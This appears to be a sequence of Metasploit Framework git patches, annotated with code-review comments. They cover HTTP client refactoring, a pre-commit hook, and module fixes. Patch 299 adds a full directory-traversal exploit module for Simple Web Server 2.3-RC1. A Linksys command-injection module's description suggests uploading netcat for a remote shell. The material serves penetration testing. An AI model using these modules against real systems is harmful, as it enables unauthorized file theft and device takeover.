From: David Maloney <DMaloney@rapid7.com> Date: Tue, 5 Feb 2013 09:57:33 -0600 Subject: [PATCH 287/421] if we don't support the auth return original res make sure we return the original 401 if we don't support the auth. --- lib/rex/proto/http/client.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index c06de1884e38..771230edd80b 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -431,6 +431,7 @@ def send_auth(res, opts, t, persist) end return res end + return res end def basic_auth_header(username,password) From 16b4fb1faa8fab1009d4fc7ee0d31828591c178e Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Tue, 5 Feb 2013 10:36:51 -0600 Subject: [PATCH 288/421] Added some comment documentation --- lib/rex/proto/http/client.rb | 37 ++++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 771230edd80b..ade8eb339721 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -392,10 +392,21 @@ def send_request(req, t = -1) conn.put(req.to_s) end + # Validates that the client has creds def have_creds? !(self.username.nil?) && self.username != '' end + # + # Params - + # res = The 401 response we need to auth from + # opts = the opts used to generate the request that created this response + # t = the timeout for the http requests + # persist = whether to persist the tcp connection for HTTP Pipelining + # + # Parses the response for what Authentication methods are supported. + # Sets the corect authorization options and passes them on to the correct + # method for sending the next request. def send_auth(res, opts, t, persist) supported_auths = res.headers['WWW-Authenticate'] if supported_auths.include? 'Basic' 
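Review bot: `send_auth` calls `supported_auths.include? 'Basic'` directly on `res.headers['WWW-Authenticate']`, so a 401 response that carries no challenge header would presumably raise NoMethodError on nil before the fallback `return res` added in patch 287 is reached. A guard right after the lookup, `return res if supported_auths.nil?`, keeps the behaviour that commit describes, which is handing back the original 401. In the comment block added in the @@ -392,10 +392,21 @@ hunk, "corect" should read "correct", and the `Params -` list would be easier to consume as `@param` tags. The body of `send_auth` continues outside both hunks.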
@@ -434,11 +445,28 @@ def send_auth(res, opts, t, persist) return res end + # Converts username and password into the HTTP Basic + # authorization string. def basic_auth_header(username,password) auth_str = username.to_s + ":" + password.to_s auth_str = "Basic " + Rex::Text.encode_base64(auth_str) end + + # + # Opts - + # Inherits all the same options as send_request_cgi + # Also expects some specific opts + # DigestAuthUser - The username for DigestAuth + # DigestAuthPass - The password for DigestAuth + # DigestAuthIIS - IIS uses a slighlty different implementation, set this for IIS support + # + # This method builds new request to complete a Digest Authentication cycle. + # We do not persist the original connection , to clear state in preparation for our auth + # We do persist the rest of the connection stream because Digest is a tcp session + # based authentication method. + # + def digest_auth(opts={}) @nonce_count = 0 @@ -572,6 +600,15 @@ def digest_auth(opts={}) end end + # + # Opts - + # Inherits all the same options as send_request_cgi + # provider - What Negotiate Provider to use (supports NTLM and Negotiate) + # + # Builds a series of requests to complete Negotiate Auth. Works essentially + # the same way as Digest auth. Same pipelining concerns exist. + # + def negotiate_auth(opts={}) ntlm_options = { :signing => false, From 80a8bab02f14ff3db4f1f83b955388b18144d4f6 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Tue, 5 Feb 2013 10:37:24 -0600 Subject: [PATCH 289/421] Correct the CVE reference --- modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index da5e53993055..ac7286c9b043 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb 
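Review bot: The comment added above `digest_auth` reads as contradictory: "We do not persist the original connection" is followed directly by "We do persist the rest of the connection stream", and it does not say which requests share a connection. If the intent is that the connection of the initial 401 is dropped and the follow-up requests reuse one connection, wording such as `# The connection that returned the 401 is not reused; the requests that follow share one persistent connection, because Digest auth is tied to the TCP session.` would say so. "slighlty" is a typo for "slightly". The blank line added between each comment block and its `def` (here and before `negotiate_auth` in the @@ -572,6 +600,15 @@ hunk) detaches the comment from the method for documentation tools.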
@@ -30,7 +30,7 @@ def initialize(info = {}) 'License' => MSF_LICENSE, 'References' => [ - [ 'CVE', '2012-5858' ], + [ 'CVE', '2012-5958' ], [ 'US-CERT-VU', '922681' ], [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play' ] ], From 888bb80ab6acf9408a1488c3b0f75676ae24a9a5 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Tue, 5 Feb 2013 11:55:12 -0600 Subject: [PATCH 290/421] more comments --- lib/rex/proto/http/client.rb | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index ade8eb339721..d6d3fc68f2dd 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -359,9 +359,9 @@ def close end # - # Transmit an HTTP request and receive the response - # If persist is set, then the request will attempt - # to reuse an existing connection. + # Sends a request and gets a response back + # If the request is a 401, and we have creds, it will attempt to + # complete authentication and return the final response # def send_recv(req, t = -1, persist=false) opts = req[:opts] @@ -373,6 +373,11 @@ def send_recv(req, t = -1, persist=false) res end + # + # Transmit an HTTP request and receive the response + # If persist is set, then the request will attempt + # to reuse an existing connection. + # def _send_recv(req, t = -1, persist=false) if req.kind_of? Hash and req[:string] req = req[:string] @@ -608,7 +613,7 @@ def digest_auth(opts={}) # Builds a series of requests to complete Negotiate Auth. Works essentially # the same way as Digest auth. Same pipelining concerns exist. # - + def negotiate_auth(opts={}) ntlm_options = { :signing => false, From b3e828359d479a17d2a2a0975460563276fd7c7a Mon Sep 17 00:00:00 2001 
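Review bot: The rewritten comment above `send_recv` in the @@ -359,9 +359,9 @@ hunk says "If the request is a 401", but 401 is a status of the response; `# If the response is a 401, and we have creds, it will attempt to` is what the code path describes. The new text also drops any mention of `persist`, which `send_recv` still accepts, so a line such as `# persist is handed on to the underlying request (see _send_recv)` would keep the parameter documented, assuming that is how it is used in the part of the body outside the hunk.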
From: Tasos Laskos <Tasos_Laskos@rapid7.com> Date: Wed, 6 Feb 2013 01:02:46 +0200 Subject: [PATCH 291/421] Web::HTTP#_request: allow Rex opt level overrides Allow overriding options at the Rex level when performing requests via the Auxiliary::Web::HTTP wrapper. --- lib/msf/core/auxiliary/web/http.rb | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index 0a59187c02f2..a7c8fc86e38c 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -266,10 +266,12 @@ def queue( request ) end def _request( url, opts = {} ) - body = opts[:body] + body = opts[:body] timeout = opts[:timeout] || 10 - method = opts[:method].to_s.upcase || 'GET' - url = url.is_a?( URI ) ? url : URI( url.to_s ) + method = opts[:method].to_s.upcase || 'GET' + url = url.is_a?( URI ) ? url : URI( url.to_s ) + + rex_overrides = opts.delete( :rex ) || {} param_opts = {} @@ -285,10 +287,11 @@ def _request( url, opts = {} ) end opts = @request_opts.merge( param_opts ).merge( - 'uri' => url.path || '/', - 'method' => method, + 'uri' => url.path || '/', + 'method' => method, 'headers' => headers.merge( opts[:headers] || {} ) - ) + # Allow for direct rex overrides + ).merge( rex_overrides ) opts['data'] = body if body From faeaa74a49c905b11082bd00e4e05175b626c38e Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Wed, 6 Feb 2013 11:06:13 -0600 Subject: [PATCH 292/421] Msftidy whitespace --- modules/auxiliary/admin/http/netgear_sph200d_traversal.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb index 311bb838967b..632a991c0f98 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb 
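Review bot: In `_request`, the realigned line `method = opts[:method].to_s.upcase || 'GET'` can never fall back to 'GET', because `nil.to_s.upcase` is an empty string and an empty string is truthy in Ruby; a call without `:method` leaves `method` empty. `method = (opts[:method] || 'GET').to_s.upcase` applies the default as written. Separately, `opts.delete( :rex )` mutates the hash the caller passed in, and because `.merge( rex_overrides )` runs last, a `'headers'` key in the override replaces the merged header set instead of adding to it; if that is intended, the comment on that line should say so. The body of `_request` continues outside both hunks.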
@@ -76,7 +76,7 @@ def find_files(file,user,pass) :category => "web", :method => "GET" }) - + loot = store_loot("lfi.data","text/plain",rhost, res.body,file) vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}") elsif res and res.code @@ -89,7 +89,7 @@ def run_host(ip) pass = datastore['PASSWORD'] vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") - + #test login begin res = send_request_cgi({ From 734bd614e1e6a6bbd758e299ce82f0d340a051fe Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Wed, 6 Feb 2013 11:13:30 -0600 Subject: [PATCH 293/421] Adds a pre-commit hook that fires off msftidy If people use this, it'll cut down quite a bit on trivial module errors. --- tools/dev/pre-commit-hook.rb | 50 ++++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100755 tools/dev/pre-commit-hook.rb diff --git a/tools/dev/pre-commit-hook.rb b/tools/dev/pre-commit-hook.rb new file mode 100755 index 000000000000..f4e712a15291 --- /dev/null +++ b/tools/dev/pre-commit-hook.rb 
@@ -0,0 +1,50 @@ +#!/usr/bin/env ruby + +# Check that modules actually pass msftidy checks first. +# To install this script, make this your pre-commit hook your local +# metasploit-framework clone. For example, if you have checked out +# the Metasploit Framework to: +# +# /home/mcfakepants/git/metasploit-framework +# +# then you will copy this script to: +# +# /home/mcfakepants/git/metasploit-framework/.git/hooks/pre-commit +# +# You must mark it executable (chmod +x), and do not name it +# pre-commit.rb (just pre-commit) + +valid = true # Presume validity +files_to_check = [] + +results = %x[git diff --cached --name-only] + +results.each_line do |fname| + fname.strip! + next unless File.exist?(fname) and File.file?(fname) + next unless fname =~ /modules.+\.rb/ + files_to_check << fname +end + +if files_to_check.empty? + puts "--- No Metasploit modules to check, committing. ---" +else + puts "--- Checking module syntax with tools/msftidy.rb ---" + files_to_check.each do |fname| + cmd = "ruby ./tools/msftidy.rb #{fname}" + msftidy_output= %x[ #{cmd} ] + puts "#{fname} - msftidy check passed" if msftidy_output.empty? + msftidy_output.each_line do |line| + valid = false + puts line + end + end + puts "-" * 52 +end + +unless valid + puts "msftidy.rb objected, aborting commit" + puts "To bypass this check use: git commit --no-verify" + puts "-" * 52 + exit(1) +end From 22e3458ceacb519ef75c156f1f3ec09dd6c943c0 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Wed, 6 Feb 2013 11:27:58 -0600 Subject: [PATCH 294/421] Fix multi-line output due to bad regex flag --- modules/auxiliary/scanner/upnp/ssdp_msearch.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index 48990169786a..2488a21d06eb 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb 
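Review bot: The hook builds `cmd = "ruby ./tools/msftidy.rb #{fname}"` and runs it through `%x[ ]`, so every staged file name is parsed by the shell; a name containing spaces or shell metacharacters breaks the check or runs unintended commands on the committer's machine. Passing the arguments as a list avoids the shell on Ruby 1.9 or later: `msftidy_output = IO.popen(['ruby', './tools/msftidy.rb', fname], &:read)`. The filter `fname =~ /modules.+\.rb/` is also unanchored, so it matches paths that merely contain "modules" and names that continue after `.rb`; `%r{\Amodules/.+\.rb\z}` states the intent. `git diff --cached --name-only` quotes unusual file names unless `-z` is used, which is worth a comment next to the `results` assignment.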
@@ -144,14 +144,14 @@ def scanner_process(data, shost, sport) } } - if data =~ /^Server:[\s]*(.*)/mi + if data =~ /^Server:[\s]*(.*)/i @results[skey][:info][:server] = $1.strip end ssdp_host = nil ssdp_port = 80 location_string = '' - if data =~ /^Location:[\s]*(.*)/mi + if data =~ /^Location:[\s]*(.*)/i location_string = $1 @results[skey][:info][:location] = $1.strip if location_string[/(https?):\x2f\x2f([^\x5c\x2f]+)/] @@ -168,7 +168,7 @@ def scanner_process(data, shost, sport) end end - if data =~ /^USN:[\s]*(.*)/mi + if data =~ /^USN:[\s]*(.*)/i @results[skey][:info][:usn] = $1.strip end From e175e2c9e9b321a955f96bf7e4902835b7c372d2 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Wed, 6 Feb 2013 12:19:57 -0600 Subject: [PATCH 295/421] typo in method name --- modules/auxiliary/scanner/misc/dvr_config_disclosure.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb index b2e36eaefa5d..3201f3f340af 100644 --- a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb +++ b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb @@ -37,7 +37,7 @@ def initialize end - def get_ppooe_credentials(conf) + def get_pppoe_credentials(conf) user = "" password = "" @@ -208,7 +208,7 @@ def run_host(ip) get_ftp_credentials(conf) get_dvr_credentials(conf) get_ddns_credentials(conf) - get_ppooe_credentials(conf) + get_pppoe_credentials(conf) dvr_name = "" if res.body =~ /DVR_NAME=(.*)/ From 5357e236751fc0a07f522e89425ed30b40148e6c Mon Sep 17 00:00:00 2001 
From: Tod Beardsley <todb@metasploit.com> Date: Wed, 6 Feb 2013 12:46:50 -0600 Subject: [PATCH 296/421] Fixups to the Linksys module Professionalizes the description a little, but more importantly, handles LANIP better, I think. Instead of faking a 1.1.1.1 address, just detect if it's set or not in a method and return the right thing accordingly. Please test this before landing, obviously. I think it's what's intended. --- .../admin/http/linksys_wrt54gl_exec.rb | 27 ++++++++++--------- 1 file changed, 15 insertions(+), 12 deletions(-) diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb index ea37ca8e21a8..2c99d9c9f41c 100644 --- a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb @@ -20,13 +20,12 @@ def initialize(info = {}) of the application. Default credentials are always a good starting point. admin/admin or admin and blank password could be a first try. - Note: This is a blind os command injection vulnerability. This means that + Note: This is a blind OS command injection vulnerability. This means that you will not see any output of your command. Try a ping command to your - local system for a first test. + local system and observe the packets with tcpdump (or equivalent) for a first test. Hint: To get a remote shell you could upload a netcat binary and exec it. - WARNING: Backup your network and dhcp configuration. We will overwrite it! - Have phun + WARNING: this module will overwrite network and DHCP configuration. }, 'Author' => [ 'm-1-k-3' ], 'License' => MSF_LICENSE, 
@@ -50,13 +49,23 @@ def initialize(info = {}) OptString.new('PASSWORD',[ false, 'Password to login with', 'password']), OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1']), OptString.new('NETMASK', [ false, 'LAN Netmask of the router', '255.255.255.0']), - OptAddress.new('LANIP', [ false, 'LAN IP address of the router - CHANGE THIS', '1.1.1.1']), + OptAddress.new('LANIP', [ false, 'LAN IP address of the router (default is RHOST)']), OptString.new('ROUTER_NAME', [ false, 'Name of the router', 'cisco']), OptString.new('WAN_DOMAIN', [ false, 'WAN Domain Name', 'test']), OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500']) ], self.class) end + # If the user configured LANIP, use it. Otherwise, use RHOST. + # NB: This presumes a dotted quad ip address. + def lan_ip + if datastore['LANIP'].to_s.empty? + datastore['RHOST'] + else + datastore['LANIP'] + end + end + def run #setting up some basic variables uri = datastore['TARGETURI'] @@ -67,13 +76,7 @@ def run wandomain = datastore['WAN_DOMAIN'] wanmtu = datastore['WAN_MTU'] - if datastore['LANIP'] !~ /1.1.1.1/ - #there is a configuration from the user so we use LANIP for the router configuration - ip = datastore['LANIP'].split('.') - else - #no configuration from user so we use RHOST for the router configuration - ip = rhost.split('.') - end + ip = lan_ip.split('.') if datastore['PASSWORD'].nil? pass = "" From 7d9982f6accba653b6057cb9801d6ac436151a79 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Wed, 6 Feb 2013 14:07:20 -0600 Subject: [PATCH 297/421] Add pcaprub to gem deps --- Gemfile | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Gemfile b/Gemfile index fc720a23b7a5..3d5f14fe4c89 100755 --- a/Gemfile +++ b/Gemfile @@ -16,6 +16,8 @@ gem 'nokogiri' gem 'pg', '>= 0.11' # Needed by anemone crawler gem 'robots' +# For sniffer and raw socket modules +gem 'pcaprub' group :development do # Markdown formatting for yard 
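Review bot: `ip = lan_ip.split('.')` in `run` is used without checking that the value is a dotted quad, and the fallback added in `lan_ip` is `datastore['RHOST']`, which may be a hostname or an IPv6 address. The new comment admits the assumption, but the description changed in this same commit says the module overwrites network and DHCP configuration, so a wrong number of octets would presumably end up in the settings sent to the router (the request that uses `ip` is outside the hunk). A guard before the split would stop early: `unless lan_ip =~ /\A\d{1,3}(\.\d{1,3}){3}\z/`, then `print_error("LANIP or RHOST must be an IPv4 address")` and `return`. `run` continues beyond the hunk.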
From d5b0482127f4cc66ce7c4f16febaff6328de1f72 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Wed, 6 Feb 2013 14:19:18 -0600 Subject: [PATCH 298/421] Note linking strat in comment docs --- tools/dev/pre-commit-hook.rb | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/tools/dev/pre-commit-hook.rb b/tools/dev/pre-commit-hook.rb index f4e712a15291..2625d6d64af6 100755 --- a/tools/dev/pre-commit-hook.rb +++ b/tools/dev/pre-commit-hook.rb @@ -13,6 +13,10 @@ # # You must mark it executable (chmod +x), and do not name it # pre-commit.rb (just pre-commit) +# +# If you want to keep up on changes with this hook, just: +# +# ln -sf <this file> <path to commit hook> valid = true # Presume validity files_to_check = [] From b09f819e4bd49c9683a7c261a3a65599bcc9e42f Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 6 Feb 2013 17:02:07 -0600 Subject: [PATCH 299/421] Add Simple Web Server dir traversal --- .../http/simple_webserver_traversal.rb | 106 ++++++++++++++++++ 1 file changed, 106 insertions(+) create mode 100644 modules/auxiliary/scanner/http/simple_webserver_traversal.rb diff --git a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb new file mode 100644 index 000000000000..a4cf884e184d --- /dev/null +++ b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb 
@@ -0,0 +1,106 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Simple Web Server 2.3-RC1 Directory Traversal', + 'Description' => %q{ + This module exploits a directory traversal vulnerability found in + Simple Web Server 2.3-RC1. + }, + 'References' => + [ + [ 'OSVDB', '88877' ], + [ 'EDB', '23886' ], + [ 'URL', 'http://seclists.org/bugtraq/2013/Jan/12' ] + ], + 'Author' => + [ + 'CwG GeNiuS', + 'sinn3r' + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "Jan 03 2013" + )) + + register_options( + [ + OptString.new('FILEPATH', [true, 'The name of the file to download', 'boot.ini']) + ], self.class) + + deregister_options('RHOST') + end + + + # + # The web server will actually return two HTTP statuses: A 400 (Bad Request), and the actual + # HTTP status -- the second one is what we want. We cannot use the original update_cmd_parts() + # in Response, because that will only grab the first HTTP status. + # + def parse_status_line(res) + str = res.to_s + + status_line = str.scan(/HTTP\/(.+?)\s+(\d+)\s?(.+?)\r?\n?$/) + + if status_line.empty? 
+ fail_with(Exploit::Failure::Unknown, "Invalid response command string.") + elsif status_line.length == 1 + proto, code, message = status_line[0] + else + proto, code, message = status_line[1] + end + + return message, code.to_i, proto + end + + + # + # The MSF API cannot parse this weird response + # + def parse_body(res) + str = res.to_s + str.split(/\r\n\r\n/)[2] || '' + end + + + def run_host(ip) + uri = normalize_uri("../"*8, datastore['FILEPATH']) + res = send_request_raw({'uri'=>uri}) + + if not res + print_error("#{ip}:#{rport} - Request timed out.") + return + end + + # The weird HTTP response totally messes up Rex::Proto::Http::Response, HA! + message, code, proto = parse_status_line(res) + body = parse_body(res) + + if code == 200 + + if body.empty? + print_status("#{ip}:#{rport} - File is empty.") + return + end + + vprint_line(body) + fname = ::File.basename(datastore['FILEPATH']) + p = store_loot('simplewebserver.file', 'application/octet-stream', ip, body, fname) + print_good("#{ip}:#{rport} - #{fname} stored in: #{p}") + else + print_error("#{ip}:#{rport} - Unable to retrieve file: #{code.to_s} (#{message})") + end + end +end \ No newline at end of file From a15889305aa763a37452e55647be2971602d8d0d Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Wed, 6 Feb 2013 18:56:06 -0600 Subject: [PATCH 300/421] Return a Request object Still changes the return type, but now at least .to_s will give you the right thing and at least a Request object is a logical thing to return. --- lib/rex/proto/http/client.rb | 134 +++++++++++++++++++--------------- lib/rex/proto/http/request.rb | 2 + 2 files changed, 78 insertions(+), 58 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index d6d3fc68f2dd..760268a7f78e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb 
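Review bot: `parse_body` keeps only the third element of `str.split(/\r\n\r\n/)`, so a retrieved file that itself contains an empty CRLF line is cut at that point and `store_loot` records a truncated copy without any message. Limiting the split keeps the remainder intact: `str.split(/\r\n\r\n/, 3)[2] || ''`. Separately, `vprint_line(body)` writes server-supplied bytes straight to the console; a comment such as `# body is untrusted remote content` above it would make that explicit for whoever maintains the module.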
@@ -151,27 +151,44 @@ def set_config(opts = {}) # # Create an arbitrary HTTP request # + # @param opts [Hash] + # @option opts 'agent' [String] User-Agent header value + # @option opts 'basic_auth' [String] Basic-Auth header value + # @option opts 'connection' [String] Connection header value + # @option opts 'cookie' [String] Cookie header value + # @option opts 'data' [String] HTTP data (only useful with some methods, see rfc2616) + # @option opts 'encode' [Bool] URI encode the supplied URI, default: false + # @option opts 'headers' [Hash] HTTP headers, e.g. <code>{ "X-MyHeader" => "value" }</code> + # @option opts 'method' [String] HTTP method to use in the request, not limited to standard methods defined by rfc2616, default: GET + # @option opts 'proto' [String] protocol, default: HTTP + # @option opts 'query' [String] raw query string + # @option opts 'raw_headers' [Hash] HTTP headers + # @option opts 'uri' [String] the URI to request + # @option opts 'version' [String] version of the protocol, default: 1.1 + # @option opts 'vhost' [String] Host header value + # + # @return [Request] def request_raw(opts={}) - c_enc = opts['encode'] || false - c_uri = opts['uri'] || '/' + c_ag = opts['agent'] || config['agent'] + c_auth = opts['basic_auth'] || config['basic_auth'] || '' c_body = opts['data'] || '' + c_conn = opts['connection'] + c_cook = opts['cookie'] || config['cookie'] + c_enc = opts['encode'] || false + c_head = opts['headers'] || config['headers'] || {} + c_host = opts['vhost'] || config['vhost'] || self.hostname c_meth = opts['method'] || 'GET' c_prot = opts['proto'] || 'HTTP' - c_vers = opts['version'] || config['version'] || '1.1' c_qs = opts['query'] - c_ag = opts['agent'] || config['agent'] - c_cook = opts['cookie'] || config['cookie'] - c_host = opts['vhost'] || config['vhost'] || self.hostname - c_head = opts['headers'] || config['headers'] || {} c_rawh = opts['raw_headers']|| config['raw_headers'] || '' - c_conn = opts['connection'] - c_auth = 
opts['basic_auth'] || config['basic_auth'] || '' + c_uri = opts['uri'] || '/' + c_vers = opts['version'] || config['version'] || '1.1' # An agent parameter was specified, but so was a header, prefer the header if c_ag and c_head.keys.map{|x| x.downcase }.include?('user-agent') c_ag = nil end - + uri = set_uri(c_uri) req = '' @@ -191,7 +208,6 @@ def request_raw(opts={}) req << set_host_header(c_host) req << set_agent_header(c_ag) - if (c_auth.length > 0) req << set_basic_auth_header(c_auth) end 
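Review bot: The new YARD line `@option opts 'raw_headers' [Hash] HTTP headers` does not match the code below it, where `c_rawh` falls back to `''` and is later passed to `set_raw_headers` next to the real hash option `headers`. Documenting it as `# @option opts 'raw_headers' [String] raw header text` would avoid callers passing a Hash by mistake (how the string is emitted is not visible in this hunk). `request_cgi` inherits the same wording through `@option opts (see #request_raw)`. YARD also spells the type `[Boolean]`, not `[Bool]`, for `'encode'`.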
@@ -201,53 +217,45 @@ def request_raw(opts={}) req << set_extra_headers(c_head) req << set_raw_headers(c_rawh) req << set_body(c_body) - - {:string => req , :opts => opts} + + request = Request.new + request.parse(req) + request.options = opts + + request end # # Create a CGI compatible request # - # Options: - # - agent: User-Agent header value - # - basic_auth: Basic-Auth header value - # - connection: Connection header value - # - cookie: Cookie header value - # - ctype: Content-Type header value, default: +application/x-www-form-urlencoded+ - # - data: HTTP data (only useful with some methods, see rfc2616) - # - encode: URI encode the supplied URI, default: false - # - encode_params: URI encode the GET or POST variables (names and values), default: true - # - headers: HTTP headers as a hash, e.g. <code>{ "X-MyHeader" => "value" }</code> - # - method: HTTP method to use in the request, not limited to standard methods defined by rfc2616, default: GET - # - proto: protocol, default: HTTP - # - query: raw query string - # - raw_headers: HTTP headers as a hash - # - uri: the URI to request - # - vars_get: GET variables as a hash to be translated into a query string - # - vars_post: POST variables as a hash to be translated into POST data - # - version: version of the protocol, default: 1.1 - # - vhost: Host header value + # @param (see #request_raw) + # @option opts (see #request_raw) + # @option opts 'ctype' [String] Content-Type header value, default: +application/x-www-form-urlencoded+ + # @option opts 'encode_params' [Bool] URI encode the GET or POST variables (names and values), default: true + # @option opts 'vars_get' [Hash] GET variables as a hash to be translated into a query string + # @option opts 'vars_post' [Hash] POST variables as a hash to be translated into POST data # + # @return [Request] def request_cgi(opts={}) + c_ag = opts['agent'] || config['agent'] + c_body = opts['data'] || '' + c_cgi = opts['uri'] || '/' + c_conn = opts['connection'] + 
c_cook = opts['cookie'] || config['cookie'] c_enc = opts['encode'] || false c_enc_p = (opts['encode_params'] == true or opts['encode_params'].nil? ? true : false) - c_cgi = opts['uri'] || '/' - c_body = opts['data'] || '' + c_head = opts['headers'] || config['headers'] || {} + c_host = opts['vhost'] || config['vhost'] c_meth = opts['method'] || 'GET' + c_path = opts['path_info'] c_prot = opts['proto'] || 'HTTP' - c_vers = opts['version'] || config['version'] || '1.1' c_qs = opts['query'] || '' - c_varg = opts['vars_get'] || {} - c_varp = opts['vars_post'] || {} - c_head = opts['headers'] || config['headers'] || {} c_rawh = opts['raw_headers'] || config['raw_headers'] || '' c_type = opts['ctype'] || 'application/x-www-form-urlencoded' - c_ag = opts['agent'] || config['agent'] - c_cook = opts['cookie'] || config['cookie'] - c_host = opts['vhost'] || config['vhost'] - c_conn = opts['connection'] - c_path = opts['path_info'] + c_varg = opts['vars_get'] || {} + c_varp = opts['vars_post'] || {} + c_vers = opts['version'] || config['version'] || '1.1' uri = set_cgi(c_cgi) qstr = c_qs @@ -264,7 +272,7 @@ def request_cgi(opts={}) c_varg.each_pair do |var,val| qstr << '&' if qstr.length > 0 - qstr << (c_enc_p ? set_encode_uri(var) : var) + qstr << (c_enc_p ? set_encode_uri(var) : var) qstr << '=' qstr << (c_enc_p ? set_encode_uri(val) : val) end @@ -315,12 +323,19 @@ def request_cgi(opts={}) req << set_raw_headers(c_rawh) req << set_body(pstr) - {:string => req , :opts => opts} + request = Request.new + request.parse(req) + request.options = opts + + request end # # Connects to the remote server if possible. # + # @param t [Fixnum] Timeout + # @see Rex::Socket::Tcp.create + # @return [Rex::Socket::Tcp] def connect(t = -1) # If we already have a connection and we aren't pipelining, close it. if (self.conn) 
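Review bot: The result of `request.parse(req)` is discarded at the end of `request_raw`, and again in `request_cgi` (hunk -315/+323), so a string the parser does not fully accept would still be returned as a `Request` that looks valid. Callers now send `req.to_s`; whether that always equals the string assembled above for non-standard methods, protocols or raw headers is not visible in this diff. Checking the return value and raising when parsing does not complete would keep such a mismatch from going unnoticed. A comment above the call, e.g. `# Re-parse the assembled string so callers receive a Request object`, would also explain why the string is built first.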
@@ -360,28 +375,29 @@ def close # # Sends a request and gets a response back - # If the request is a 401, and we have creds, it will attempt to - # complete authentication and return the final response + # + # If the request is a 401, and we have creds, it will attempt to complete + # authentication and return the final response # def send_recv(req, t = -1, persist=false) - opts = req[:opts] - req = req[:string] res = _send_recv(req,t,persist) if res and res.code == 401 and res.headers['WWW-Authenticate'] and have_creds? - res = send_auth(res, opts, t, persist) + res = send_auth(res, req.options, t, persist) end res end # # Transmit an HTTP request and receive the response - # If persist is set, then the request will attempt - # to reuse an existing connection. # + # If persist is set, then the request will attempt to reuse an existing + # connection. + # + # Call this directly instead of {#send_recv} if you don't want automatic + # authentication handling. + # + # @return [Response] def _send_recv(req, t = -1, persist=false) - if req.kind_of? Hash and req[:string] - req = req[:string] - end @pipeline = persist send_request(req, t) res = read_response(t) @@ -392,12 +408,14 @@ def _send_recv(req, t = -1, persist=false) # # Send an HTTP request to the server # + # 